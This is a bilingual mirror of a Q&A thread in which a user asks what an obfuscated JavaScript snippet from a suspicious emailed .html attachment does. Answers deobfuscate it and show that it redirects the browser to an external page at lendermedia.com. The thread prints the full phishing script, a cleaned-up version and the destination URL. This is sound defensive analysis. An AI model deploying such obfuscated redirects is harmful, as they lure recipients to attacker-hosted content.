这个可疑的网络钓鱼代码有什么作用?

发布于 2024-09-04 20:44:03 字数 964 浏览 12 评论 0原文

我的一些非 IT 同事打开了一封电子邮件中的 .html 附件,该附件看起来非常可疑。当运行某些 javascript 代码时,会导致黑屏。

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么?这超出了我的编程知识范围。

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(4

草莓味的萝莉 2024-09-11 20:44:04

它将重定向到一个网址,'http://lendermedia.com/images/z.htm'(遵循它的风险由您自己承担)。

将代码复制并粘贴到有价值的 JavaScript 编辑器中,并让它为您格式化源代码。

要点:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h 将等于 'http://lendermedia.com/images/ z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t 将包含对 document.location 的引用

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

b 名为 href 的属性>,此时(在另一个函数内)实际上是上面语句中的 t,被设置为 h,即 url。

大部分代码只是噪音,实际功能包括:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();

It will redirect to an url, 'http://lendermedia.com/images/z.htm' (follow it on your own risk).

Copy and paste the code to a worthy JavaScript editor and have it format the source for you.

Key points:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h will equal 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t will contain a reference to document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

Most of the code is mere noise, the actual functionality consists of this:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();
小矜持 2024-09-11 20:44:04

我遇到了同样的问题,然后找到了这个页面。在对联系信息进行 WHOIS 查询后,我联系了 lendermedia.com 的所有者,他似乎刚刚发现他的网站在他不知情的情况下托管 z.htm 页面,并且违反了他的要求愿望。当我联系他时,我能够浏览他的 /images/ 目录。此后他更改了权限。所有这些都表明这个人看起来很干净,但这由你决定。

I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the z.htm page w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.

千秋岁 2024-09-11 20:44:04

减去混淆,它会执行类似 document.location.href="http://lendermedia.com/images/z.htm" 的操作

Minus the obfuscation, it does something like document.location.href="http://lendermedia.com/images/z.htm"

那片花海 2024-09-11 20:44:04

理解该代码的关键部分是 replace(/[\^H\!9X]/g, '') 部分。如果替换的第二个参数是 '',那么它只是从前一个字符串中删除内容。

混淆事物的方式确实很不优雅。目标可能只是对每个用户进行随机处理并避免贝叶斯垃圾邮件过滤器。

Key part to understand that code is the replace(/[\^H\!9X]/g, '') parts. if the 2nd argument for the replace is '', then it's merely removing stuff from the previous string.

Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文